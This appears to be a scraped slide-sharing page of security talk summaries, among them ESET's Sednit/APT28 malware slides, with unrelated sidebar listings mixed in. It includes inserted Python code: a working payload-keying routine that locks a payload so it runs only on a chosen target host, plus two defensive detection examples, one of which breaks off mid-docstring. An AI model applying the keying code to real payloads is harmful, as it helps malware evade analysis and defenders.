This talk (hopefully) provides some new pentester tools and tricks. Basically a continuation of last year’s Dirty Little Secrets They Didn’t Teach You in Pentest Class. Topics include: OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using Metasploit.
- The author discusses their journey doing source code reviews to find bugs in WordPress plugins and themes. They started with just two people manually reviewing code but then automated the process and expanded their team.
- Through their Phase 1 efforts analyzing over 250 plugins, they found over 250 issues. They are now focusing on authenticated vulnerabilities in Phase 2 like SQL injection, XSS, and CSRF.
- They have created some open source tools to help with the process and are seeking volunteers to help make open source software more secure by joining their Codevigilant platform.
Demo Showcase: Graphs for Cybersecurity in Action - Neo4j
This document discusses how graph databases can help with cyber security challenges. It begins with an introduction to the presenter and an acknowledgement that cyber security is a serious issue. The presentation argues that graphs can provide a holistic view of connected enterprise data to help with risk assessment, protection of critical assets, anomaly detection, rapid response, and recovery from incidents. It provides an example of how Neo4j was used to analyze a targeted Windows attack. The document concludes with a demonstration of using Neo4j and graph techniques to analyze Windows domain auditing data and assess exposure/risk.
Protect Your Payloads: Modern Keying Techniques - Leo Loobeek
The document discusses keying techniques for encrypting payloads in a way that only allows decryption on specific target systems. It covers using local system resources like environment variables or file paths to derive encryption keys. It also introduces using remote resources like web pages or DNS records hosted by the attacker to control when payloads execute. Tools like Ebowla, KeyRing, and KeyServer are presented as ways to implement these keying techniques for various scripting languages and to automate controlling remote keys. The goal is to make payloads only executable on intended targets and to maintain control over payload execution.
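The local-resource keying described above, as an added example in the spirit of the technique (not Ebowla, KeyRing or KeyServer code): a key is derived with PBKDF2 from attributes that exist only on the intended target (here three environment variables), the payload is encrypted under an HMAC-SHA256 keystream, and an HMAC tag lets the stub tell a wrong environment from a corrupt blob and exit without revealing anything. The attribute names, the two environments and the payload bytes are constructed for the demo; a real stub would read them from the live process environment.

```python
import hashlib
import hmac
import os
import secrets

# Attributes the key is derived from; the payload unlocks only where all match.
# These names are an example choice for the demo, not a fixed list from any tool.
KEYING_ATTRS = ("USERDOMAIN", "COMPUTERNAME", "USERNAME")
PBKDF2_ROUNDS = 100_000


def collect_attrs(env=None) -> dict:
    """Gather keying attributes from an environment mapping (upper-cased for stability)."""
    env = os.environ if env is None else env
    return {k: env.get(k, "").upper() for k in KEYING_ATTRS}


def derive_key(attrs: dict, salt: bytes) -> bytes:
    """64 bytes of key material: first half encrypts, second half authenticates."""
    material = "|".join(f"{k}={attrs[k]}" for k in KEYING_ATTRS).encode()
    return hashlib.pbkdf2_hmac("sha256", material, salt, PBKDF2_ROUNDS, dklen=64)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream built from HMAC-SHA256 (stdlib only, no AES needed)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def lock_payload(payload: bytes, attrs: dict) -> bytes:
    """Encrypt and authenticate the payload against the target's attributes.

    Blob layout: salt(16) | nonce(16) | tag(32) | ciphertext.
    """
    salt = secrets.token_bytes(16)
    nonce = secrets.token_bytes(16)
    key = derive_key(attrs, salt)
    enc_key, mac_key = key[:32], key[32:]
    ct = bytes(a ^ b for a, b in zip(payload, _keystream(enc_key, nonce, len(payload))))
    tag = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    return salt + nonce + tag + ct


def unlock_payload(blob: bytes, attrs: dict):
    """Return the payload if this environment derives the right key, else None."""
    salt, nonce, tag, ct = blob[:16], blob[16:32], blob[32:64], blob[64:]
    key = derive_key(attrs, salt)
    enc_key, mac_key = key[:32], key[32:]
    expected = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # wrong host or tampered blob: reveal nothing, fail quietly
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct))))


# Constructed target and non-target environments for the demo.
TARGET_ENV = {"USERDOMAIN": "corp", "COMPUTERNAME": "ws-fin-07", "USERNAME": "jdoe"}
OTHER_ENV = {"USERDOMAIN": "sandbox", "COMPUTERNAME": "analyst-vm", "USERNAME": "jdoe"}
PAYLOAD = b"Write-Host 'stage two would run here'"  # stand-in for the real payload


if __name__ == "__main__":
    blob = lock_payload(PAYLOAD, collect_attrs(TARGET_ENV))
    print("on target :", unlock_payload(blob, collect_attrs(TARGET_ENV)))
    print("elsewhere :", unlock_payload(blob, collect_attrs(OTHER_ENV)))
```

The same lock/unlock pair covers the remote variant the abstract mentions: if one of the attribute values is fetched at run time from an operator-controlled DNS record or web page instead of the local environment, changing or removing that record changes the derived key and the payload stops unlocking, which is what gives the operator control over when it executes. Because the blob carries only a salt and tag, an analyst who recovers it off-target has to guess the environment values, not break the cipher.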
John Bambenek discusses tracking exploit kits by monitoring their infrastructure and operations. He explains that by disrupting entire exploit kit ecosystems, more can be done than taking down individual malware operators. Bambenek describes how exploit kits work and outlines strategies for gathering intelligence on exploit kits, such as decoding landing pages, using PCREs to find new sites, and leveraging resources like Bing's malicious URL feed to collect potential targets for dynamic analysis. The goal is to develop intelligence that can be used to disrupt the operations of exploit kit operators and affiliates.
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews of some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low on their list of priorities access control and least privilege sit. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And he'll give you some useful guidelines on how to close the gaps yourself.
This document provides information about ADRecon, a tool for gathering information from an Active Directory environment. It extracts and combines artifacts like users, groups, and permissions and presents them in an Excel report. The document discusses the tool's modules, prerequisites, and who uses it. It also covers how to audit directory service access and detect enumeration with ADRecon through techniques like deploying deception objects and enabling auditing on uncommon attributes.
Talk about Andromeda at Botconf 2015. Abstract:
Andromeda, also known as Gamarue by some Antivirus vendors, is a popular and modular bot active since 2011. It is normally used to spread additional malware, but sometimes, depending on the criminals, the main objective could be just stealing user credentials. After almost five years of life its development has not stopped. The people behind it keep maintaining it and adding functionalities, like new anti-analysis routines, changes in the communication encryption, new request formats, etc.
This talk will not just give details about the latest changes in the Andromeda binary and control panel; it will also answer some interesting questions about this botnet. Which versions are the most popular nowadays? Are most of the botnets spreading malware or just using its plugins? What are the most popular plugins? How and where is Andromeda sold? Who is selling it? What criminal groups are using Andromeda? It is not just a talk about malware reversing but about the whole Andromeda ecosystem.
For those of you who missed it, this is my slide deck from SecTor 2009, "When Web 2.0 Attacks!" ... reference to Web 2.0, and many of the technologies that make up the mish-mash that makes today's web application landscape so impossible to secure.
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality" - StHack
The main idea behind this talk is to introduce the listeners of the Sthack conference to the current landscape of botnet threats. We'll begin by talking about the main types of malware botnets: banking Trojans, point-of-sale malware and credential stealers, but we will focus on how some of these botnets operate at a technical level, especially how the bots of Dyre, JackPoS and Pony work nowadays in order to steal credit cards and banking credentials.
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker - Cisco Canada
The document discusses various hacking techniques depicted in the TV show Mr. Robot and used by cyber attackers, and how Cisco consultants use similar tools and methods. It provides examples of how characters in Mr. Robot hacked systems like a thermostat by splicing into the BACnet network, stole credentials using a Rubber Ducky USB and Mimikatz, and carried out phishing attacks using the Social Engineering Toolkit. Cisco consultants conduct penetration tests using vulnerabilities like Shellshock, post-exploitation tools like Mimikatz and John the Ripper, and social engineering assessments. The document emphasizes that understanding the cyber attack lifecycle or "kill chain" is important for effective incident response.
During this talk, we looked at some of the typical controls that Android/iOS applications exhibit, how they work, how to spot them, and how to sidestep them. We’ll demonstrate analysis and techniques using free open source tooling such as Radare and Frida, and for some parts, we’ll use IDA Pro. And since “automation” is the buzzword of the year, we’ll discuss how to automate some of these activities, which typically take up most of the assessment window.
For more information, please visit our website at www.synopsys.com/software
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
This document provides an overview of malware on Android systems. It discusses the Android architecture and security model, how to analyze Android application packages (APKs), and techniques for reverse engineering and creating Android malware. Specific malware examples like Trojan-SMS.FakePlayer.a and Geinimi are described. The document also covers tools for mobile application penetration testing and discusses both legal and illegal ways that Android malware can generate money.
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
Derbycon 2011
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration - Positive Hack Days
This document discusses using honeypots to reverse penetrate attackers and gain intelligence on them. It describes how a honeypot was used to collect information from attackers like usernames, source IPs, and intermediate hosts. On some occasions, it allowed gaining access to third party services those attackers had authenticated with. The document concludes honeypots can provide useful intelligence but also raises legal and ethical concerns with counterattacking or collecting personal information.
This document discusses using honeypots to reverse penetrate attackers and gain intelligence on them. It describes how a honeypot was used to collect information from attackers like usernames, source IPs, and intermediate hosts. On some occasions, it was able to exploit browsers or third party services to gather additional data like email addresses. However, more skilled attackers avoided running untrusted software. The document concludes honeypots can provide useful intelligence but also raises moral and legal issues with counterattacking or exploiting attackers.
This cybersecurity training involves watching an informative webinar video to earn knowledge on the topic, taking a 20 question exam to test understanding of the material, and receiving a certificate by email for scores over 70% to demonstrate completion of the training.
This cybersecurity awareness training document outlines steps to take a webinar on cybersecurity, distribute the training link within an organization, and download free materials to track team performance.
How to implement a robust information security management system? - ESET
An Information Security Management System (ISMS) involves implementing and maintaining processes to efficiently manage the protection of information and, in doing so, ensuring its integrity, confidentiality and availability. You may implement guidelines set out in ISO 27001, COBIT, NIST or in any other similar framework or you may even create your own management system. What matters in order to make ISMS efficient is to consider all these factors of the cycle.
#AntimalwareDay: The ESET Celebration of the Origins of Computer Defense in N... - ESET
On November 3, 1983, Frederick Cohen, a student at the engineering school of the University of Southern California (USC), was sure that a malicious program could be used to exploit any connected system, but he wondered how long it would take for the code to do so.
He prepared a prototype that – after eight hours of hard work on a VAX 11/750 system running Unix – was ready to be shown at the weekly security seminar he attended. It was his lecturer, Leonard Adleman, who baptized that program as a computer virus.
Read more about #AntimalwareDay on WeLiveSecurity.com: https://goo.gl/QCSnc5
ESET Quick Guide to the EU General Data Protection Regulation - ESET
The General Data Protection Regulation (GDPR) is an EU-wide reform of data protection laws and policies that will take effect in 2018. It aims to strengthen and unify data protection for individuals within the EU. Key changes include requirements for companies to notify customers of data breaches, higher fines for noncompliance, and "data protection by design" where privacy is built into products from the start. The GDPR requires organizations to implement encryption and other security measures to protect personal data and ensure its confidentiality.
This document summarizes a presentation on Advanced Persistent Threats (APTs) given by Aryeh Goretsky, a Distinguished Researcher at ESET. The presentation defines APTs as determined adversaries who conduct cyber attacks in phases, including reconnaissance of targets, analysis of vulnerabilities, development of tools to exploit vulnerabilities, trial runs of attacks, and implantation of attacks on targets. It discusses techniques used in APTs, such as rootkits, command and control servers, custom file systems and partitions, evasion methods, firmware attacks, and programming languages. The presentation aims to explain how to think like a determined adversary conducting a cyber attack campaign.
Presentation of ESET researcher Olivier Bilodeau from Virus Bulletin Conference 2015.
Embedded Linux platforms have been increasingly targeted by malware authors over the past few years. The targeted devices, grouped under the umbrella term 'Internet of Things', are generally consumer routers, gateways or modems. They are compromised remotely via brute-forcing of their credentials or by falling victim to an unpatched vulnerability, such as the infamous Shellshock. Most of these compromises result in the targeted system being assimilated into a botnet.
Read more about Linux/Moose here: http://www.welivesecurity.com/2015/05/26/dissecting-linuxmoose/
Unpack your troubles*: .NET packer tricks and countermeasures - ESET
This document discusses techniques used by .NET packers to obfuscate code and evade analysis. It covers how packers load encrypted next layers using Assembly.Load(), encrypt user strings and reference them using tokens, and hide and restore CIL code at JIT time. The author then provides solutions for analyzing packed samples, such as setting breakpoints on Assembly.Load() to detect next layers, and on JIT resolution APIs to catch decrypted code and strings. Sample Windbg scripts and a whitepaper are referenced for further technical details.
ESET: #DoMore With Our Comprehensive Range of Business Products - ESET
This document provides an overview of ESET, an IT security company founded in 1987. It details ESET's headquarters in Bratislava, regional centers, malware research centers, and worldwide presence with over 1,000 employees. The document highlights ESET's comprehensive range of business security products, including endpoint protection, data access protection, scanning and update options, and usability features. It also summarizes ESET's technology alliances and added value services like premium support and cutting-edge detection technologies.
Following months of in-depth worldwide business user research and thousands of man-hours spent on its development, we are proudly introducing the new, completely re-engineered and redesigned line of #ESET business security products, now available worldwide. Check out our multi-layered security solutions and #DoMore!
http://www.eset.com/int/about/press/articles/products/article/esets-next-generation-business-security-products-now-available-worldwide
ESET: Delivering Benefits to Medium and Large Businesses - ESET
Our researcher Aryeh Goretsky took a look at some of the more interesting pieces of malware and threats that have occurred over the first six months of the year 2014. And what a year it has been, with some serious new developments as well as persistence of numerous older threats.
Learn more about ESET and our solutions for mobile platforms - ESET
ESET, the pioneer of proactive protection and the maker of the award-winning ESET NOD32® technology, has been a worldwide provider of security solutions for over 26 years. The global leader in proactive detection showcased its flagship application for Android smartphones and tablets, ESET Mobile Security, and ESET Secure Authentication, a two-factor authentication solution for most mobile platforms. Coinciding with the Mobile World Congress, ESET is launching a #mobileweek initiative enabling users to enjoy premium features of ESET Mobile Security at just half its original price on Google Play and the Amazon App Store.
Trends for 2014: The Challenge of Internet Privacy - ESET
ESET's annual threat trends report addresses several subjects in information security. The aim of this report is to make the community aware of the present computer threat landscape and, accordingly, attempt to predict its possible evolution in the coming years.
Find more information on WeLiveSecurity.com: http://www.welivesecurity.com/2013/12/17/esets-threat-trends-predictions-2014-the-next-battle-for-internet-privacy-a-new-assault-on-androids-and-a-new-wave-of-hi-tech-malware/
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...PECB
Denis is a dynamic and results-driven Chief Information Officer (CIO) with a distinguished career spanning information systems analysis and technical project management. With a proven track record of spearheading the design and delivery of cutting-edge Information Management solutions, he has consistently elevated business operations, streamlined reporting functions, and maximized process efficiency.
Certified as an ISO/IEC 27001: Information Security Management Systems (ISMS) Lead Implementer, Data Protection Officer, and Cyber Risks Analyst, Denis brings a heightened focus on data security, privacy, and cyber resilience to every endeavor.
His expertise extends across a diverse spectrum of reporting, database, and web development applications, underpinned by an exceptional grasp of data storage and virtualization technologies. His proficiency in application testing, database administration, and data cleansing ensures seamless execution of complex projects.
What sets Denis apart is his comprehensive understanding of Business and Systems Analysis technologies, honed through involvement in all phases of the Software Development Lifecycle (SDLC). From meticulous requirements gathering to precise analysis, innovative design, rigorous development, thorough testing, and successful implementation, he has consistently delivered exceptional results.
Throughout his career, he has taken on multifaceted roles, from leading technical project management teams to owning solutions that drive operational excellence. His conscientious and proactive approach is unwavering, whether he is working independently or collaboratively within a team. His ability to connect with colleagues on a personal level underscores his commitment to fostering a harmonious and productive workplace environment.
Date: May 29, 2024
Tags: Information Security, ISO/IEC 27001, ISO/IEC 42001, Artificial Intelligence, GDPR
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: ISO/IEC 27001 Information Security Management System - EN | PECB
ISO/IEC 42001 Artificial Intelligence Management System - EN | PECB
General Data Protection Regulation (GDPR) - Training Courses - EN | PECB
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
Chapter wise All Notes of First year Basic Civil Engineering.pptxDenish Jangid
Chapter wise All Notes of First year Basic Civil Engineering
Syllabus
Chapter-1
Introduction to objective, scope and outcome the subject
Chapter 2
Introduction: Scope and Specialization of Civil Engineering, Role of civil Engineer in Society, Impact of infrastructural development on economy of country.
Chapter 3
Surveying: Object Principles & Types of Surveying; Site Plans, Plans & Maps; Scales & Unit of different Measurements.
Linear Measurements: Instruments used. Linear Measurement by Tape, Ranging out Survey Lines and overcoming Obstructions; Measurements on sloping ground; Tape corrections, conventional symbols. Angular Measurements: Instruments used; Introduction to Compass Surveying, Bearings and Longitude & Latitude of a Line, Introduction to total station.
Levelling: Instrument used Object of levelling, Methods of levelling in brief, and Contour maps.
Chapter 4
Buildings: Selection of site for Buildings, Layout of Building Plan, Types of buildings, Plinth area, carpet area, floor space index, Introduction to building byelaws, concept of sun light & ventilation. Components of Buildings & their functions, Basic concept of R.C.C., Introduction to types of foundation
Chapter 5
Transportation: Introduction to Transportation Engineering; Traffic and Road Safety: Types and Characteristics of Various Modes of Transportation; Various Road Traffic Signs, Causes of Accidents and Road Safety Measures.
Chapter 6
Environmental Engineering: Environmental Pollution, Environmental Acts and Regulations, Functional Concepts of Ecology, Basics of Species, Biodiversity, Ecosystem, Hydrological Cycle; Chemical Cycles: Carbon, Nitrogen & Phosphorus; Energy Flow in Ecosystems.
Water Pollution: Water Quality standards, Introduction to Treatment & Disposal of Waste Water. Reuse and Saving of Water, Rain Water Harvesting. Solid Waste Management: Classification of Solid Waste, Collection, Transportation and Disposal of Solid. Recycling of Solid Waste: Energy Recovery, Sanitary Landfill, On-Site Sanitation. Air & Noise Pollution: Primary and Secondary air pollutants, Harmful effects of Air Pollution, Control of Air Pollution. . Noise Pollution Harmful Effects of noise pollution, control of noise pollution, Global warming & Climate Change, Ozone depletion, Greenhouse effect
Text Books:
1. Palancharmy, Basic Civil Engineering, McGraw Hill publishers.
2. Satheesh Gopi, Basic Civil Engineering, Pearson Publishers.
3. Ketki Rangwala Dalal, Essentials of Civil Engineering, Charotar Publishing House.
4. BCP, Surveying volume 1
हिंदी वर्णमाला पीपीटी, hindi alphabet PPT presentation, hindi varnamala PPT, Hindi Varnamala pdf, हिंदी स्वर, हिंदी व्यंजन, sikhiye hindi varnmala, dr. mulla adam ali, hindi language and literature, hindi alphabet with drawing, hindi alphabet pdf, hindi varnamala for childrens, hindi language, hindi varnamala practice for kids, https://www.drmullaadamali.com
LAND USE LAND COVER AND NDVI OF MIRZAPUR DISTRICT, UPRAHUL
This Dissertation explores the particular circumstances of Mirzapur, a region located in the
core of India. Mirzapur, with its varied terrains and abundant biodiversity, offers an optimal
environment for investigating the changes in vegetation cover dynamics. Our study utilizes
advanced technologies such as GIS (Geographic Information Systems) and Remote sensing to
analyze the transformations that have taken place over the course of a decade.
The complex relationship between human activities and the environment has been the focus
of extensive research and worry. As the global community grapples with swift urbanization,
population expansion, and economic progress, the effects on natural ecosystems are becoming
more evident. A crucial element of this impact is the alteration of vegetation cover, which plays a
significant role in maintaining the ecological equilibrium of our planet.Land serves as the foundation for all human activities and provides the necessary materials for
these activities. As the most crucial natural resource, its utilization by humans results in different
'Land uses,' which are determined by both human activities and the physical characteristics of the
land.
The utilization of land is impacted by human needs and environmental factors. In countries
like India, rapid population growth and the emphasis on extensive resource exploitation can lead
to significant land degradation, adversely affecting the region's land cover.
Therefore, human intervention has significantly influenced land use patterns over many
centuries, evolving its structure over time and space. In the present era, these changes have
accelerated due to factors such as agriculture and urbanization. Information regarding land use and
cover is essential for various planning and management tasks related to the Earth's surface,
providing crucial environmental data for scientific, resource management, policy purposes, and
diverse human activities.
Accurate understanding of land use and cover is imperative for the development planning
of any area. Consequently, a wide range of professionals, including earth system scientists, land
and water managers, and urban planners, are interested in obtaining data on land use and cover
changes, conversion trends, and other related patterns. The spatial dimensions of land use and
cover support policymakers and scientists in making well-informed decisions, as alterations in
these patterns indicate shifts in economic and social conditions. Monitoring such changes with the
help of Advanced technologies like Remote Sensing and Geographic Information Systems is
crucial for coordinated efforts across different administrative levels. Advanced technologies like
Remote Sensing and Geographic Information Systems
9
Changes in vegetation cover refer to variations in the distribution, composition, and overall
structure of plant communities across different temporal and spatial scales. These changes can
occur natural.
This presentation was provided by Steph Pollock of The American Psychological Association’s Journals Program, and Damita Snow, of The American Society of Civil Engineers (ASCE), for the initial session of NISO's 2024 Training Series "DEIA in the Scholarly Landscape." Session One: 'Setting Expectations: a DEIA Primer,' was held June 6, 2024.
Main Java[All of the Base Concepts}.docxadhitya5119
This is part 1 of my Java Learning Journey. This Contains Custom methods, classes, constructors, packages, multithreading , try- catch block, finally block and more.
1. Visiting The Bear Den
A Journey in the Land of (Cyber-)Espionage
Joan Calvet, Jessy Campos, Thomas Dupuy
2. Sednit Group
• Also known as APT28, Fancy Bear, Sofacy, STRONTIUM, Tsar Team
• Group of attackers conducting targeted attacks since 2006
• Mainly interested in geopolitics
3. Plan
• Context
• The Week Serge Met The Bear
• The Mysterious DOWNDELPH
• Speculative Mumblings
5. Who Is The Bear After? (1)
• We found a list of targets for Sednit phishing campaigns:
– Operators used Bitly and “forgot” to set the profile private (feature now removed from Bitly)
– Around 4,000 shortened URLs during 6 months in 2015
10. Who Is The Bear After? (3)
• Embassies and ministries of more than 40 countries
• NATO and EU institutions
• “Who’s who” of individuals involved in Eastern Europe politics:
– Politicians
– Activists
– Journalists
– Academics
– Militaries
– …
11. The Bear Has Money
• A bag full of 0-day exploits (timeline, April to October 2015):
– CVE-2015-3043 (Flash)
– CVE-2015-1701 (Windows LPE)
– CVE-2015-2590 (Java)
– CVE-2015-4902 (Java click-to-play bypass)
– CVE-2015-7645 (Flash)
– CVE-2015-2424 (Office RCE)
12. The Bear Can Code
• Tens of custom-made software used since 2006:
– Droppers
– Downloaders
– Reconnaissance tools
– Long-term spying backdoors
– Encryption proxy tool
– USB C&C channel
– Many helper tools
– …
13. Disclaimers
• Over the last two years we tracked Sednit closely, but of course our visibility is not exhaustive
• How do we know it is ONE group?
– We don’t
– Our Sednit “definition” is based on their toolkit and the related infrastructure
• We do not do attribution (but we point out hints that may be used for that)
15. Who Is Serge?
• Code name for an imaginary Sednit target
• Serge is a government employee with access to sensitive information
• The chain of events in Serge’s attack matches several real cases we investigated
• We use it as a textbook case to present (a part of) the Sednit toolkit
23. …Serge Meets SEDKIT
• Exploit-kit for targeted attacks
• Entry-point URLs mimic legitimate URLs
• Usually propagated by targeted phishing emails (also seen with hacked website + iframe)
• Period of activity: September 2014 - Now
30. … and Visits Sednit Exploits Factory
Vulnerability                    Targeted Application    Note
CVE-2013-1347                    Internet Explorer 8
CVE-2013-3897                    Internet Explorer 8
CVE-2014-1510 + CVE-2014-1511    Firefox
CVE-2014-1776                    Internet Explorer 11
CVE-2014-6332                    Internet Explorer       Several versions
N/A                              MacKeeper
CVE-2015-2590 + CVE-2015-4902    Java                    0-day*
CVE-2015-3043                    Adobe Flash             0-day*
CVE-2015-5119                    Adobe Flash             Hacking Team gift
CVE-2015-7645                    Adobe Flash             0-day*
* : At the time SEDKIT dropped them
34. Revamping CVE-2014-6332 (a.k.a. IE “Unicorn bug”)
• October 2015:
– Re-use of public PoC to disable VBScript “SafeMode”
– Next stage binary downloaded by PowerShell
• February 2016:
– No more “SafeMode” disabling, direct ROP-based shellcode execution
– Around 400 lines of VBScript, mostly custom
41. Serge Meets SEDUPLOADER (a.k.a. JHUHUGIT, JKEYSKW)
• Downloaded by SEDKIT
• Two binaries: the dropper and its embedded payload
• Deployed as a first-stage component
• Period of activity: March 2015 - Now
68. …Serge meets SEDRECO
• Downloaded by SEDUPLOADER
• Backdoor with the ability to load external plugins
• Usually deployed as a second stage backdoor to spy on the infected computer
• Period of activity: 2012 - Now
69. Dropper
• Drops encrypted configuration
– In a file (“msd”)
– In the Windows Registry
• No configuration linked to the payload
97. Serge Meets XAGENT (a.k.a SPLM, CHOPSTICK)
• Downloaded by SEDUPLOADER
• Modular backdoor developed in C++ with Windows, Linux and iOS versions
• Deployed in most Sednit operations, usually after the reconnaissance phase
• Period of activity: November 2012 - Now
101. Linux XAGENT
• Linux XAGENT, compiled in July 2015
• ~ 18,000 lines of code in 59 classes
• Derives from Windows version
• XAGENT major version 2, but matches the logic of currently distributed binaries (version 3)
111. Communication Workflow (diagram)
XAGENT INFECTED COMPUTER:
• Modules (RemoteShell, FSModule, Keylogger) exchange unencrypted messages with the AgentKernel
• AgentKernel (AgentKernel::run()) translates messages from modules for the C&C server, and translates messages from the C&C server for modules
• Channel (HTTP or emails) carries encrypted messages between the infected computer and the C&C SERVER
• Other component shown: Controller
124. Emails Channel (1)
Workflow (diagram): the XAGENT INFECTED COMPUTER, USING MailChannel, talks to the C&C SERVER through two mailboxes (exfil@gmail.com and orders@gmail.com); each side sends over SMTPS and retrieves over POP3S.
An email-based C&C protocol needs to provide:
1. A way to distinguish C&C emails from unrelated emails
2. A way to bypass spam filters
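A detection-side counterpart to the mailbox channel above, added here as an example and not code from the ESET talk: an implant that uses a webmail account as its C&C must poll the mailbox over POP3S on a schedule and push results over SMTPS, so a host that does both toward a public mail provider at a steady cadence stands out in connection logs. The host names, provider list, thresholds and log lines are constructed for the demo.

```python
"""Added example (not from the ESET talk): a heuristic for spotting a mailbox-based
C&C channel like the one described above. Hosts that poll a public mail provider
over POP3S (995) at a steady cadence and also send to it over SMTPS (465) are
flagged. The host names, provider list and log lines are constructed for the demo."""
from collections import defaultdict
from statistics import mean, pstdev

SMTPS, POP3S = 465, 995

# Consumer mail hosts a managed workstation has no business reaching directly
# over raw POP3S/SMTPS (constructed list; adapt to local policy).
EXTERNAL_MAIL = {"smtp.gmail.com", "pop.gmail.com"}

# Constructed connection log: "<epoch_seconds> <src_host> <dst_host> <dst_port>".
# ws-serge polls every 600 s and sends just after each poll; ws-alice is a
# one-off personal-mail user; ws-bob only talks to the intranet.
SAMPLE_LOG = """\
1000 ws-serge pop.gmail.com 995
1001 ws-serge smtp.gmail.com 465
1600 ws-serge pop.gmail.com 995
1602 ws-serge smtp.gmail.com 465
2200 ws-serge pop.gmail.com 995
2199 ws-serge smtp.gmail.com 465
2800 ws-serge pop.gmail.com 995
2801 ws-serge smtp.gmail.com 465
3400 ws-serge pop.gmail.com 995
1100 ws-alice pop.gmail.com 995
5000 ws-alice pop.gmail.com 995
5030 ws-alice smtp.gmail.com 465
9999 ws-bob intranet.example 443
"""


def parse_log(text):
    """Group timestamps by (src_host, dst_port) for mail-provider connections only."""
    conns = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        port = int(port)
        if dst in EXTERNAL_MAIL and port in (SMTPS, POP3S):
            conns[(src, port)].append(int(ts))
    return conns


def is_periodic(timestamps, min_gaps=3, max_cv=0.2):
    """True when inter-arrival gaps are regular: at least min_gaps gaps whose
    coefficient of variation (stdev / mean) is at most max_cv."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < min_gaps:
        return False
    m = mean(gaps)
    return m > 0 and pstdev(gaps) / m <= max_cv


def find_mail_beacons(text):
    """Return [(host, mean_poll_gap_seconds)] for hosts showing both a periodic
    POP3S poll loop and at least one SMTPS upload to the same provider set."""
    conns = parse_log(text)
    flagged = []
    for host in sorted({src for src, _ in conns}):
        polls = conns.get((host, POP3S), [])
        sends = conns.get((host, SMTPS), [])
        if sends and is_periodic(polls):
            ts = sorted(polls)
            gap = mean(b - a for a, b in zip(ts, ts[1:]))
            flagged.append((host, float(gap)))
    return flagged


if __name__ == "__main__":
    for host, gap in find_mail_beacons(SAMPLE_LOG):
        print(f"{host}: periodic POP3S polling every ~{gap:.0f}s plus SMTPS uploads")
```

The coefficient-of-variation threshold is what separates a polling loop from a human reading mail; a real deployment would feed it firewall or proxy records and tune `max_cv` and `min_gaps` against the environment's baseline, since implants that add jitter to their sleep will need a looser threshold.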
135. XAGENT Proxy Server
• Python code used between April and June 2015
• ~ 12,200 lines of code
• Translates the email protocol from XAGENT into an HTTP protocol for the C&C server (diagram: P2Protocol on the XAGENT / INBOX side of the XAGENT PROXY BACKEND, P3Protocol (over HTTP) between the XAGENT PROXY BACKEND and the C&C SERVER)
137. Chain of Events (timeline, Mon to Fri)
• 9:30AM: Serge opens an email leading to SEDKIT, and then SEDUPLOADER
• 10:00AM: SEDRECO deployment
• 02:00PM: XAGENT deployment
139. Serge Meets Passwords Extractors
• SecurityXploded tools (grand classic of Sednit)
– Cons: usually detected by AV software
• Custom tools, in particular a Windows Live Mail passwords extractor compiled for Serge
140. Serge Meets Windows Passwords Extractors
• From registry hives
– Deployed with LPE for CVE-2014-4076
• Good ol’ Mimikatz (“pi.log”)
– Deployed with LPE for CVE-2015-1701
155. Code Obfuscation (1)
• Starting in July 2015 XTUNNEL code was obfuscated (which is two months after the Sednit attack against the German parliament, where XTUNNEL was used)
• The obfuscation is a mix of classic syntactic techniques, like insertion of junk code and opaque predicates
159. Chain of Events (timeline, Mon to Fri)
• 9:30AM: Serge opens an email leading to SEDKIT, and then SEDUPLOADER
• 10:00AM: SEDRECO deployment
• 02:00PM: XAGENT deployment
• Then: information exfiltration and lateral movements
161. Long Term Persistence (1)
• Special XAGENT copied in Office folder under the name “msi.dll”
162. Long Term Persistence (2)
• system32\msi.dll is a legitimate Windows DLL needed by Office applications
• XAGENT msi.dll exports the same function names as the legitimate msi.dll
164. Long Term Persistence (3)
• Each time Serge starts Office, XAGENT msi.dll is loaded (search-order hijacking):
– Loads real msi.dll from system32
– Fills its export table with the addresses of the real msi.dll functions
– Starts XAGENT malicious logic
• Same technique also seen with LINKINFO.dll dropped in C:\WINDOWS
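The persistence trick above leaves a simple artifact: a file carrying a system DLL's name sits in a folder that should never contain one (the Office folder, C:\WINDOWS), and its content differs from the copy in system32. The check below, added here as an example and not code from the ESET talk, scans application directories for exactly that; the directory layout, the DLL name list and the file contents are constructed for the demo.

```python
"""Added example (not from the ESET talk): a check for the search-order hijacking
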